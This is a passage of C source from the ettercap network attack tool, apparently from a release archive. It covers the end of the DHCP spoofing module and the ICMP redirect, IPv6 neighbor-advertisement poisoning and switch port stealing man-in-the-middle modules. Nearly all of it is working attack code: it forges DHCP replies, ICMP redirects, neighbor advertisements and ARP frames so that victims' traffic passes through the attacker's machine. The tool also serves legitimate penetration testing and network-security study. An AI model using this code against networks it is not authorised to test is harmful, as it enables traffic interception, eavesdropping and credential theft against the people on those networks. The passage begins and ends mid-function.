ip_addr_init(&client, AF_INET, opt + 1); else { /* search if the client already has the ip address */ if (dhcp->dhcp_cip != 0) { ip_addr_init(&client, AF_INET, (u_char *)&dhcp->dhcp_cip); } else return; } /* set the requested ip */ dhcp->dhcp_yip = *client.addr32; /* this is a dhcp ACK */ dhcp_options[2] = DHCP_ACK; /* * if it is a request after an offer from a server, * spoof its ip to be stealth. */ if ((opt = get_dhcp_option(DHCP_OPT_SRV_ADDR, options, end)) != NULL) { /* get the server id */ ip_addr_init(&server, AF_INET, opt + 1); /* set it in the header */ dhcp->dhcp_sip = *server.addr32; /* set it in the options */ ip_addr_cpy((u_char*)dhcp_options + 5, &server); send_dhcp_reply(&server, dhcp_addr_reply(&po->L3.src), po->L2.src, (u_char*)dhcp_hdr, (u_char*)dhcp_options, dhcp_optlen); } else { /* * the request does not contain an identifier, * use our ip address */ dhcp->dhcp_sip = *EC_GBL_IFACE->ip.addr32; /* set it in the options */ ip_addr_cpy((u_char*)dhcp_options + 5, &EC_GBL_IFACE->ip); send_dhcp_reply(&EC_GBL_IFACE->ip, dhcp_addr_reply(&po->L3.src), po->L2.src, (u_char*)dhcp_hdr, (u_char*)dhcp_options, dhcp_optlen); } USER_MSG("DHCP spoofing: fake ACK [%s] ", mac_addr_ntoa(po->L2.src, tmp)); USER_MSG("assigned to %s \n", ip_addr_ntoa(&client, tmp)); } /* * parses the discovery message and send the spoofed reply */ static void dhcp_spoofing_disc(struct packet_object *po) { char dhcp_hdr[LIBNET_DHCPV4_H]; struct libnet_dhcpv4_hdr *dhcp; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("dhcp_spoofing_disc"); /* no more ip available in the pool */ if (dhcp_free_ip == SLIST_END(&dhcp_ip_pool.ips)) return; /* get a local copy of the dhcp header */ memcpy(dhcp_hdr, po->DATA.data, LIBNET_DHCPV4_H); dhcp = (struct libnet_dhcpv4_hdr *)dhcp_hdr; /* use the same dhcp header, but change the type of the message */ dhcp->dhcp_opcode = LIBNET_DHCP_REPLY; /* this is a dhcp OFFER */ dhcp_options[2] = DHCP_OFFER; /* set the free ip from the pool */ dhcp->dhcp_yip = *dhcp_free_ip->ip.addr32; /* set it in the header */ dhcp->dhcp_sip = *EC_GBL_IFACE->ip.addr32; /* set it in the options */ ip_addr_cpy((u_char*)dhcp_options + 5, &EC_GBL_IFACE->ip); /* send the packet */ send_dhcp_reply(&EC_GBL_IFACE->ip, dhcp_addr_reply(&po->L3.src), po->L2.src, (u_char*)dhcp_hdr, (u_char*)dhcp_options, dhcp_optlen); USER_MSG("DHCP spoofing: fake OFFER [%s] ", mac_addr_ntoa(po->L2.src, tmp)); USER_MSG("offering %s \n", ip_addr_ntoa(&dhcp_free_ip->ip, tmp)); /* move the pointer to the next ip */ dhcp_free_ip = LIST_NEXT(dhcp_free_ip, next); } /* * prepare the buffer with the options to be used * in replies */ static void dhcp_setup_options(void) { int time; u_int8 *p = (u_int8*)dhcp_options; DEBUG_MSG("dhcp_setup_options"); /* lease time from conf file */ time = htonl(EC_GBL_CONF->dhcp_lease_time); /* the type of reply */ *p++ = DHCP_OPT_MSG_TYPE; *p++ = 1; *p++ = DHCP_ACK; /* server identifier */ put_dhcp_option(DHCP_OPT_SRV_ADDR, EC_GBL_IFACE->ip.addr, ntohs(EC_GBL_IFACE->ip.addr_len), &p); /* lease time */ put_dhcp_option(DHCP_OPT_LEASE_TIME, (u_int8 *)&time, 4, &p); /* the netmask */ put_dhcp_option(DHCP_OPT_NETMASK, dhcp_netmask.addr, ntohs(dhcp_netmask.addr_len), &p); /* the gateway */ put_dhcp_option(DHCP_OPT_ROUTER, EC_GBL_IFACE->ip.addr, ntohs(EC_GBL_IFACE->ip.addr_len), &p); /* the dns */ put_dhcp_option(DHCP_OPT_DNS, dhcp_dns.addr, ntohs(dhcp_dns.addr_len), &p); /* end of options */ *p++ = DHCP_OPT_END; /* the total len of the options */ dhcp_optlen = (char *)p - (char *)dhcp_options; /* pad to the minimum length */ if (dhcp_optlen < DHCP_OPT_MIN_LEN) { memset(p, 0, DHCP_OPT_MIN_LEN - dhcp_optlen); dhcp_optlen = DHCP_OPT_MIN_LEN; } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/mitm/ec_icmp_redirect.c000664 000000 000000 00000010004 13711276346 020636 0ustar00rootroot000000 000000 /* ettercap -- ICMP redirect mitm module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include /* globals */ static struct target_env redirected_gw; /* protos */ void icmp_redirect_init(void); static int icmp_redirect_start(char *args); static void icmp_redirect_stop(void); static void icmp_redirect(struct packet_object *po); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered mitm */ void __init icmp_redirect_init(void) { struct mitm_method mm; mm.name = "icmp"; mm.start = &icmp_redirect_start; mm.stop = &icmp_redirect_stop; mitm_add(&mm); } /* * init the ICMP REDIRECT attack */ static int icmp_redirect_start(char *args) { struct ip_list *i; char tmp[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("icmp_redirect_start"); /* check the parameter */ if (!strcmp(args, "")) { SEMIFATAL_ERROR("ICMP redirect needs a parameter.\n"); } else { char temp[strlen(args)+3]; /* add the / to be able to use the target parsing function */ snprintf(temp, strlen(args)+3, "%s//", args); if (compile_target(temp, &redirected_gw) != E_SUCCESS) SEMIFATAL_ERROR("Wrong target parameter"); } /* we need both mac and ip addresses */ if (redirected_gw.all_mac || redirected_gw.all_ip) SEMIFATAL_ERROR("You must specify both MAC and IP addresses for the GW"); i = LIST_FIRST(&redirected_gw.ips); USER_MSG("ICMP redirect: victim GW %s\n", ip_addr_ntoa(&i->ip, tmp)); /* add the hook to receive all the tcp and udp packets */ hook_add(HOOK_PACKET_TCP, &icmp_redirect); hook_add(HOOK_PACKET_UDP, &icmp_redirect); return E_SUCCESS; } /* * shut down the redirect process */ static void icmp_redirect_stop(void) { DEBUG_MSG("icmp_redirect_stop"); USER_MSG("ICMP redirect stopped.\n"); /* delete the hook points */ hook_del(HOOK_PACKET_TCP, &icmp_redirect); hook_del(HOOK_PACKET_UDP, &icmp_redirect); } /* * the redirect function. * * redirect all the traffic that goes thru the gateway * check the dst mac address and the dst ip address. * * respect the TARGETs for the redirections */ static void icmp_redirect(struct packet_object *po) { struct ip_list *i; char tmp[MAX_ASCII_ADDR_LEN]; /* retrieve the gw ip */ i = LIST_FIRST(&redirected_gw.ips); /* the packet must be directed to the gateway */ if (memcmp(po->L2.dst, redirected_gw.mac, MEDIA_ADDR_LEN)) return; /* * if the packet endpoint is the gateway, skip it. * we are interested only in packet going THRU the * gateway, not TO the gateway */ if (!ip_addr_cmp(&po->L3.dst, &i->ip)) return; /* redirect only the connection that match the TARGETS */ EXECUTE(EC_GBL_SNIFF->interesting, po); /* the packet is not interesting */ if ( po->flags & PO_IGNORE ) return; USER_MSG("ICMP redirected %s:%d -> ", ip_addr_ntoa(&po->L3.src, tmp), ntohs(po->L4.src)); USER_MSG("%s:%d\n", ip_addr_ntoa(&po->L3.dst, tmp), ntohs(po->L4.dst)); /* send the ICMP redirect */ send_icmp_redir(ICMP_REDIRECT_HOST, &i->ip, &EC_GBL_IFACE->ip, po); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/mitm/ec_ip6nd_poison.c000664 000000 000000 00000031650 13711276346 020446 0ustar00rootroot000000 000000 /* * ICMPv6 Neighbor Advertisement poisoning ec module. * The basic idea is the same as for ARP poisoning * but ARP cannot be used with IPv6. Lurk [1] for details. * * [1] - http://packetlife.net/blog/2009/feb/2/ipv6-neighbor-spoofing/ * * the braindamaged entities collective */ #include #include #include #include #include #include /* globals */ struct hosts_group ndp_group_one; struct hosts_group ndp_group_two; #if 0 static LIST_HEAD(,ip_list) ping_list_one; static LIST_HEAD(,ip_list) ping_list_two; #endif u_int8 flags; #define ND_ONEWAY ((u_int8)(1<<0)) #define ND_ROUTER ((u_int8)(1<<2)) /* protos */ void ndp_poison_init(void); static int ndp_poison_start(char *args); static void ndp_poison_stop(void); EC_THREAD_FUNC(ndp_poisoner); static int create_list(void); static int create_list_silent(void); static void ndp_antidote(void); #if 0 static void catch_response(struct packet_object *po); static void record_mac(struct packet_object *po); #endif /* c0d3 */ void __init ndp_poison_init(void) { struct mitm_method mm; mm.name = "ndp"; mm.start = &ndp_poison_start; mm.stop = &ndp_poison_stop; mitm_add(&mm); } static int ndp_poison_start(char *args) { struct hosts_list *h, *tmp; int ret; char *p; DEBUG_MSG("ndp_poison_start"); flags = ND_ROUTER; if(strcmp(args, "")) { for(p = strsep(&args, ","); p != NULL; p = strsep(&args, ",")) { if(!strcasecmp(p, "remote")) EC_GBL_OPTIONS->remote = 1; else if(!strcasecmp(p, "oneway")) flags |= ND_ONEWAY; else SEMIFATAL_ERROR("NDP poisoning: incorrect arguments.\n"); } } /* we need the host list */ if (LIST_EMPTY(&EC_GBL_HOSTLIST)) SEMIFATAL_ERROR("NDP poisoning needs a non-emtpy hosts list.\n"); /* clean the lists */ LIST_FOREACH_SAFE(h, &ndp_group_one, next, tmp) { LIST_REMOVE(h, next); SAFE_FREE(h); } LIST_FOREACH_SAFE(h, &ndp_group_two, next, tmp) { LIST_REMOVE(h, next); SAFE_FREE(h); } if(EC_GBL_OPTIONS->silent) { ret = create_list_silent(); } else ret = create_list(); if (ret != E_SUCCESS) { SEMIFATAL_ERROR("NDP poisoning failed to start"); } /* hook necessary? - Maybe if solicitations are seen */ ec_thread_new("ndp_poisoner", "NDP spoofing thread", &ndp_poisoner, NULL); return E_SUCCESS; } static void ndp_poison_stop(void) { struct hosts_list *h; pthread_t pid; DEBUG_MSG("ndp_poison_stop"); pid = ec_thread_getpid("ndp_poisoner"); if(!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); else { DEBUG_MSG("no poisoner thread found"); return; } USER_MSG("NDP poisoner deactivated.\n"); USER_MSG("Depoisoning the victims.\n"); ndp_antidote(); ui_msg_flush(2); /* delete the elements in the first list */ while(LIST_FIRST(&ndp_group_one) != NULL) { h = LIST_FIRST(&ndp_group_one); LIST_REMOVE(h, next); SAFE_FREE(h); } /* delete the elements in the second list */ while(LIST_FIRST(&ndp_group_two) != NULL) { h = LIST_FIRST(&ndp_group_two); LIST_REMOVE(h, next); SAFE_FREE(h); } /* reset the remote flag */ EC_GBL_OPTIONS->remote = 0; return; } EC_THREAD_FUNC(ndp_poisoner) { int i = 1; struct hosts_list *t1, *t2; /* variable not used */ (void) EC_THREAD_PARAM; ec_thread_init(); DEBUG_MSG("ndp_poisoner"); /* it's a loop */ LOOP { CANCELLATION_POINT(); /* Here we go! */ LIST_FOREACH(t1, &ndp_group_one, next) { LIST_FOREACH(t2, &ndp_group_two, next) { if(!ip_addr_cmp(&t1->ip, &t2->ip)) continue; if (!EC_GBL_CONF->ndp_poison_equal_mac) /* skip equal mac addresses ... */ if (!memcmp(t1->mac, t2->mac, MEDIA_ADDR_LEN)) continue; /* * send spoofed ICMP packet to trigger a neighbor cache * entry in the victims cache */ if (i == 1 && EC_GBL_CONF->ndp_poison_icmp) { send_L2_icmp6_echo(&t2->ip, &t1->ip, t1->mac); /* from T2 to T1 */ if (!(flags & ND_ONEWAY)) send_L2_icmp6_echo(&t1->ip, &t2->ip, t2->mac); } send_L2_icmp6_nadv(&t1->ip, &t2->ip, EC_GBL_IFACE->mac, flags, t2->mac); if(!(flags & ND_ONEWAY)) send_L2_icmp6_nadv(&t2->ip, &t1->ip, EC_GBL_IFACE->mac, flags & ND_ROUTER, t1->mac); ec_usleep(EC_GBL_CONF->ndp_poison_send_delay); } } /* first warm up then release poison frequency */ if (i < 5) { i++; ec_usleep(SEC2MICRO(EC_GBL_CONF->ndp_poison_warm_up)); } else ec_usleep(SEC2MICRO(EC_GBL_CONF->ndp_poison_delay)); } return NULL; } static int create_list(void) { struct ip_list *i; struct hosts_list *h, *g; char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("ndp poisoning: create_list"); USER_MSG("\nNDP poisoning victims:\n\n"); /* the first group */ LIST_FOREACH(i, &EC_GBL_TARGET1->ip6, next) { /* walk through TARGET1 selected IPv6 addresses */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { /* search matching entry in host list */ if (!ip_addr_cmp(&i->ip, &h->ip)) { USER_MSG(" GROUP 1 : %s %s\n", ip_addr_ntoa(&h->ip, tmp), mac_addr_ntoa(h->mac, tmp2)); /* create element and insert into list */ SAFE_CALLOC(g, 1, sizeof(struct hosts_list)); memcpy(&g->ip, &h->ip, sizeof(struct ip_addr)); memcpy(&g->mac, &h->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&ndp_group_one, g, next); } } } /* the target is NULL - convert to ANY */ if (LIST_FIRST(&EC_GBL_TARGET1->ip6) == NULL) { USER_MSG(" GROUP 1 : ANY (all IPv6 hosts in the list)\n"); /* add all hosts in HOSTLIST */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { /* only IPv6 addresses are applicable */ if (ntohs(h->ip.addr_type) != AF_INET6) continue; /* create the element and insert into list */ SAFE_CALLOC(g, 1, sizeof(struct hosts_list)); memcpy(&g->ip, &h->ip, sizeof(struct ip_addr)); memcpy(&g->mac, &h->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&ndp_group_one, g, next); } } USER_MSG("\n"); /* the second group */ /* if the target was specified */ LIST_FOREACH(i, &EC_GBL_TARGET2->ip6, next) { /* walk through TARGET1 selected IPv6 addresses */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { /* search matching entry in host list */ if (!ip_addr_cmp(&i->ip, &h->ip)) { USER_MSG(" GROUP 2 : %s %s\n", ip_addr_ntoa(&h->ip, tmp), mac_addr_ntoa(h->mac, tmp2)); /* create the element and insert in the list */ SAFE_CALLOC(g, 1, sizeof(struct hosts_list)); memcpy(&g->ip, &h->ip, sizeof(struct ip_addr)); memcpy(&g->mac, &h->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&ndp_group_two, g, next); } } } /* the target is NULL - convert to ANY */ if (LIST_FIRST(&EC_GBL_TARGET2->ip6) == NULL) { USER_MSG(" GROUP 2 : ANY (all IPv6 hosts in the list)\n"); /* add them */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { /* only IPv6 addresses are applicable */ if (ntohs(h->ip.addr_type) != AF_INET6) continue; /* create the element and insert in the list */ SAFE_CALLOC(g, 1, sizeof(struct hosts_list)); memcpy(&g->ip, &h->ip, sizeof(struct ip_addr)); memcpy(&g->mac, &h->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&ndp_group_two, g, next); } } return E_SUCCESS; } static int create_list_silent(void) { struct hosts_list *h; struct ip_list *i; char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; DEBUG_MSG("create_list_silent"); LIST_FOREACH(i, &EC_GBL_TARGET1->ip6, next) { if(ip_addr_is_local(&i->ip, NULL) == E_SUCCESS) { if (!memcmp(EC_GBL_TARGET1->mac, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN)) { USER_MSG("\nERROR: MAC address must be specified in silent mode.\n"); return -E_FATAL; } SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); memcpy(&h->ip, &i->ip, sizeof(struct ip_addr)); memcpy(&h->mac, &EC_GBL_TARGET1->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&ndp_group_one, h, next); USER_MSG(" TARGET 1 : %-40s %17s\n", ip_addr_ntoa(&i->ip, tmp), mac_addr_ntoa(EC_GBL_TARGET1->mac, tmp2)); } else { USER_MSG("%s is not local. NDP poisoning impossible\n", ip_addr_ntoa(&i->ip, tmp)); return -E_FATAL; } } LIST_FOREACH(i, &EC_GBL_TARGET2->ip6, next) { if(ip_addr_is_local(&i->ip, NULL) == E_SUCCESS) { if (!memcmp(EC_GBL_TARGET2->mac, "\x00\x00\x00\x00\x00\x00", MEDIA_ADDR_LEN)) { USER_MSG("\nERROR: MAC address must be specified in silent mode.\n"); return -E_FATAL; } SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); memcpy(&h->ip, &i->ip, sizeof(struct ip_addr)); memcpy(&h->mac, &EC_GBL_TARGET2->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&ndp_group_two, h, next); USER_MSG(" TARGET 2 : %-40s %17s\n", ip_addr_ntoa(&i->ip, tmp), mac_addr_ntoa(EC_GBL_TARGET2->mac, tmp2)); } else { USER_MSG("%s is not local. NDP poisoning impossible\n", ip_addr_ntoa(&i->ip, tmp)); } } return E_SUCCESS; } /* restore neighbor cache of victims */ static void ndp_antidote(void) { struct hosts_list *h1, *h2; int i; DEBUG_MSG("ndp_antidote"); /* do it twice */ for(i = 0; i < 2; i++) { LIST_FOREACH(h1, &ndp_group_one, next) { LIST_FOREACH(h2, &ndp_group_two, next) { /* skip equal ip */ if(!ip_addr_cmp(&h1->ip, &h2->ip)) continue; if (!EC_GBL_CONF->ndp_poison_equal_mac) /* skip equal mac addresses ... */ if (!memcmp(h1->mac, h2->mac, MEDIA_ADDR_LEN)) continue; /* send neighbor advertisements with the correct information */ send_L2_icmp6_nadv(&h1->ip, &h2->ip, h1->mac, flags, h2->mac); if(!(flags & ND_ONEWAY)) send_L2_icmp6_nadv(&h2->ip, &h1->ip, h2->mac, flags & ND_ROUTER, h1->mac); ec_usleep(EC_GBL_CONF->ndp_poison_send_delay); } } ec_usleep(SEC2MICRO(EC_GBL_CONF->ndp_poison_warm_up)); } } /* * This function has been written by the initial author but * doesn't seem to be necessary as ND poisoning has been brought * to a working state - keeping the code just in case - 2013-12-31 */ #if 0 static void catch_response(struct packet_object *po) { struct hosts_list *h; struct ip_list *i; /* if it is not response to our ping */ if(ip_addr_is_ours(&po->L3.dst) != E_FOUND) return; /* * search if the node address is in one of the ping lists * if so add the address to the poison list */ LIST_FOREACH(i, &ping_list_one, next) { /* the source is in the ping hosts list */ if(!ip_addr_cmp(&po->L3.src, &i->ip)) { LIST_REMOVE(i, next); SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); memcpy(&h->ip, &po->L3.src, sizeof(struct ip_addr)); memcpy(&h->mac, &po->L2.src, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&ndp_group_one, h, next); break; } } LIST_FOREACH(i, &ping_list_two, next) { if(!ip_addr_cmp(&po->L3.src, &i->ip)) { LIST_REMOVE(i, next); SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); memcpy(&h->ip, &po->L3.src, sizeof(struct ip_addr)); memcpy(&h->mac, &po->L2.src, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&ndp_group_two, h, next); break; } } return; } #endif /* * This function has been written by the initial author but * doesn't seem to be necessary as ND poisoning has been brought * to a working state - keeping the code just in case - 2013-12-31 */ #if 0 static void record_mac(struct packet_object *po) { struct ip_addr *ip; u_char *mac; struct hosts_list *h; if(ip_addr_is_ours(&po->L3.src)) { ip = &po->L3.dst; mac = po->L2.dst; } else if(ip_addr_is_ours(&po->L3.dst)) { ip = &po->L3.src; mac = po->L2.src; } else { return; } LIST_FOREACH(h, &ndp_group_one, next) { if(!ip_addr_cmp(&h->ip, ip)) { memcpy(&h->mac, mac, MEDIA_ADDR_LEN); return; } } LIST_FOREACH(h, &ndp_group_two, next) { if(!ip_addr_cmp(&h->ip, ip)) { memcpy(&h->mac, mac, MEDIA_ADDR_LEN); return; } } } #endif ettercap-0.8.3.1/src/mitm/ec_port_stealing.c000664 000000 000000 00000030164 13711276346 020710 0ustar00rootroot000000 000000 /* ettercap -- Port Stealing mitm module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include /* globals */ struct packet_list { struct packet_object *po; TAILQ_ENTRY(packet_list) next; }; struct steal_list { struct ip_addr ip; u_char mac[MEDIA_ADDR_LEN]; u_char wait_reply; TAILQ_HEAD(, packet_list) packet_table; LIST_ENTRY(steal_list) next; }; LIST_HEAD(, steal_list) steal_table; static int steal_tree; struct eth_header { u_int8 dha[ETH_ADDR_LEN]; /* destination eth addr */ u_int8 sha[ETH_ADDR_LEN]; /* source ether addr */ u_int16 proto; /* packet type ID field */ }; struct arp_header { u_int16 ar_hrd; /* Format of hardware address. */ u_int16 ar_pro; /* Format of protocol address. */ u_int8 ar_hln; /* Length of hardware address. */ u_int8 ar_pln; /* Length of protocol address. */ u_int16 ar_op; /* ARP opcode (command). */ #define ARPOP_REQUEST 1 /* ARP request. */ }; struct arp_eth_header { u_int8 arp_sha[MEDIA_ADDR_LEN]; /* sender hardware address */ u_int8 arp_spa[IP_ADDR_LEN]; /* sender protocol address */ u_int8 arp_tha[MEDIA_ADDR_LEN]; /* target hardware address */ u_int8 arp_tpa[IP_ADDR_LEN]; /* target protocol address */ }; #define FAKE_PCK_LEN sizeof(struct eth_header)+sizeof(struct arp_header)+sizeof(struct arp_eth_header) struct packet_object fake_po; char fake_pck[FAKE_PCK_LEN]; /* protos */ void port_stealing_init(void); EC_THREAD_FUNC(port_stealer); static int port_stealing_start(char *args); static void port_stealing_stop(void); static void parse_received(struct packet_object *po); static void put_queue(struct packet_object *po); static void send_queue(struct packet_object *po); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered mitm */ void __init port_stealing_init(void) { struct mitm_method mm; mm.name = "port"; mm.start = &port_stealing_start; mm.stop = &port_stealing_stop; mitm_add(&mm); } /* * init the PORT STEALING attack */ static int port_stealing_start(char *args) { struct hosts_list *h; struct steal_list *s; struct eth_header *heth; struct arp_header *harp; char *p; char bogus_mac[6]="\x00\xe7\x7e\xe7\x7e\xe7"; DEBUG_MSG("port_stealing_start"); USER_MSG("\nPort Stealing: starting...\n\n"); steal_tree = 0; /* parse the args only if not empty */ if (strcmp(args, "")) { for (p = strsep(&args, ","); p != NULL; p = strsep(&args, ",")) { if (!strcasecmp(p, "remote")) { /* * allow sniffing of remote host even * if the target is local (used for gw) */ EC_GBL_OPTIONS->remote = 1; } else if (!strcasecmp(p, "tree")) { steal_tree = 1; } else { SEMIFATAL_ERROR("Port Stealing: paramenter incorrect.\n"); } } } /* Port Stealing works only on ethernet switches */ if (EC_GBL_PCAP->dlt != IL_TYPE_ETH) SEMIFATAL_ERROR("Port Stealing does not support this media.\n"); if (LIST_EMPTY(&EC_GBL_HOSTLIST)) SEMIFATAL_ERROR("Port stealing needs a non empty hosts list.\n"); /* Avoid sniffing loops. XXX - it remains even after mitm stopping */ capture_only_incoming(EC_GBL_IFACE->pcap, EC_GBL_IFACE->lnet); /* Create the port stealing list from hosts list */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { /* create the element and insert it in steal lists */ SAFE_CALLOC(s, 1, sizeof(struct steal_list)); memcpy(&s->ip, &h->ip, sizeof(struct ip_addr)); memcpy(s->mac, h->mac, MEDIA_ADDR_LEN); TAILQ_INIT(&s->packet_table); LIST_INSERT_HEAD(&steal_table, s, next); } /* Create the packet that will be sent for stealing. * This is a fake ARP request. */ heth = (struct eth_header *)fake_pck; harp = (struct arp_header *)(heth + 1); /* If we use our MAC address we won't generate traffic * flooding on the LAN but we will reach only direct * connected switch with the stealing process */ if (steal_tree) memcpy(heth->dha, bogus_mac, ETH_ADDR_LEN); else memcpy(heth->dha, EC_GBL_IFACE->mac, ETH_ADDR_LEN); heth->proto = htons(LL_TYPE_ARP); harp->ar_hrd = htons(ARPHRD_ETHER); harp->ar_pro = htons(ETHERTYPE_IP); harp->ar_hln = 6; harp->ar_pln = 4; harp->ar_op = htons(ARPOP_REQUEST); packet_create_object(&fake_po, (u_char*)fake_pck, FAKE_PCK_LEN); /* Add the hooks: * - handle stealed packets (mark it as forwardable) * - put the packet in the send queue after "filtering" (send arp request, stop stealing) * - send the queue on arp reply (port restored, restart stealing) */ hook_add(HOOK_PACKET_ETH, &parse_received); hook_add(HOOK_PRE_FORWARD, &put_queue); hook_add(HOOK_PACKET_ARP_RP, &send_queue); /* create the stealing thread */ ec_thread_new("port_stealer", "Port Stealing module", &port_stealer, NULL); return E_SUCCESS; } /* * shut down the poisoning process */ static void port_stealing_stop(void) { pthread_t pid; struct steal_list *s, *tmp_s = NULL; struct packet_list *p, *tmp_p = NULL; int i; DEBUG_MSG("port_stealing_stop"); /* destroy the poisoner thread */ pid = ec_thread_getpid("port_stealer"); /* the thread is active or not ? */ if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); else return; /* Remove the Hooks */ hook_del(HOOK_PACKET_ETH, &parse_received); hook_del(HOOK_PRE_FORWARD, &put_queue); hook_del(HOOK_PACKET_ARP_RP, &send_queue); USER_MSG("Prot Stealing deactivated.\n"); USER_MSG("Restoring Switch tables...\n"); ui_msg_flush(2); /* Restore Switch Tables (2 times) * by sending arp requests. */ for (i=0; i<2; i++) { LIST_FOREACH(s, &steal_table, next) { send_arp(ARPOP_REQUEST, &EC_GBL_IFACE->ip, EC_GBL_IFACE->mac, &s->ip, MEDIA_BROADCAST); ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); } } /* Free the stealing list */ LIST_FOREACH_SAFE(s, &steal_table, next, tmp_s) { /* Free the sending queue for each host */ TAILQ_FOREACH_SAFE(p, &s->packet_table, next, tmp_p) { packet_destroy_object(p->po); TAILQ_REMOVE(&s->packet_table, p, next); SAFE_FREE(p->po); SAFE_FREE(p); } LIST_REMOVE(s, next); SAFE_FREE(s); } } /* * the real Port Stealing thread */ EC_THREAD_FUNC(port_stealer) { struct steal_list *s; struct eth_header *heth; /* variable not used */ (void) EC_THREAD_PARAM; /* init the thread and wait for start up */ ec_thread_init(); heth = (struct eth_header *)fake_pck; /* never ending loop */ LOOP { CANCELLATION_POINT(); /* Walk the list and steal the ports */ LIST_FOREACH(s, &steal_table, next) { /* Steal only ports for hosts where no packet is in queue */ if (!s->wait_reply) { memcpy(heth->sha, s->mac, ETH_ADDR_LEN); send_to_L2(&fake_po); /* FIXME: port_steal_delay is defined as seconds; not microseconds... */ ec_usleep(EC_GBL_CONF->port_steal_delay); } } /* FIXME: port_steal_delay is defined as seconds; not microseconds... */ ec_usleep(EC_GBL_CONF->port_steal_delay); } return NULL; } /* Check if it's a stolen packet */ static void parse_received(struct packet_object *po) { struct steal_list *s; /* If the dest MAC is in the stealing list * mark the packet as forwardable */ LIST_FOREACH(s, &steal_table, next) { if (!memcmp(po->L2.dst, s->mac, ETH_ADDR_LEN)) { po->flags |= PO_FORWARDABLE; break; } } } /* If the packet was stolen put it in the sending * queue waiting for the port-restoring arp reply */ static void put_queue(struct packet_object *po) { struct steal_list *s; struct packet_list *p; if (po->flags & PO_DROPPED) return; LIST_FOREACH(s, &steal_table, next) { if (!memcmp(po->L2.dst, s->mac, ETH_ADDR_LEN)) { /* If the packet was not dropped stop the stealing * thread for this address, send the arp request * and put a duplicate in the host sending queue */ if (!s->wait_reply) { s->wait_reply = 1; send_arp(ARPOP_REQUEST, &EC_GBL_IFACE->ip, EC_GBL_IFACE->mac, &s->ip, MEDIA_BROADCAST); } SAFE_CALLOC(p, 1, sizeof(struct packet_list)); /* If it's a L3 packet we have to adjust * raw packet len for L2 sending (just in * case of filters' modifications) */ if (po->fwd_packet) po->len = po->fwd_len + sizeof(struct eth_header); p->po = packet_dup(po, PO_DUP_PACKET); TAILQ_INSERT_TAIL(&(s->packet_table), p, next); /* Avoid standard forwarding method */ po->flags |= PO_DROPPED; break; } } } /* If we was waiting this reply from stolen host * send its sending queue and restart stealing process */ static void send_queue(struct packet_object *po) { struct steal_list *s1, *s2; struct packet_list *p, *tmp = NULL; struct eth_header *heth; int in_list, to_wait = 0; /* Check if it's an arp reply for us */ if (memcmp(po->L2.dst, EC_GBL_IFACE->mac, MEDIA_ADDR_LEN)) return; LIST_FOREACH(s1, &steal_table, next) { if (!memcmp(po->L2.src, s1->mac, ETH_ADDR_LEN)) { /* If we was waiting for the reply it means * that there is a queue to be sent */ if (s1->wait_reply) { /* Send the packet queue (starting from * the first received packet) */ TAILQ_FOREACH_SAFE(p, &s1->packet_table, next, tmp) { /* If the source of the packet to send is not in the * stealing list, change the MAC address with ours */ in_list = 0; LIST_FOREACH(s2, &steal_table, next) { if (!memcmp(p->po->L2.src, s2->mac, ETH_ADDR_LEN)) { in_list = 1; break; } } if (!in_list) { heth = (struct eth_header *)p->po->packet; /* Paranoid test */ if (p->po->len >= sizeof(struct eth_header)) memcpy(heth->sha, EC_GBL_IFACE->mac, ETH_ADDR_LEN); } /* Send the packet on the wire */ send_to_L2(p->po); /* Destroy the packet duplicate and remove * it from the queue */ packet_destroy_object(p->po); TAILQ_REMOVE(&s1->packet_table, p, next); SAFE_FREE(p->po); SAFE_FREE(p); /* Sleep only if we have more than one packet to send */ if (to_wait) ec_usleep(EC_GBL_CONF->port_steal_send_delay); to_wait = 1; } /* Restart the stealing process for this host */ 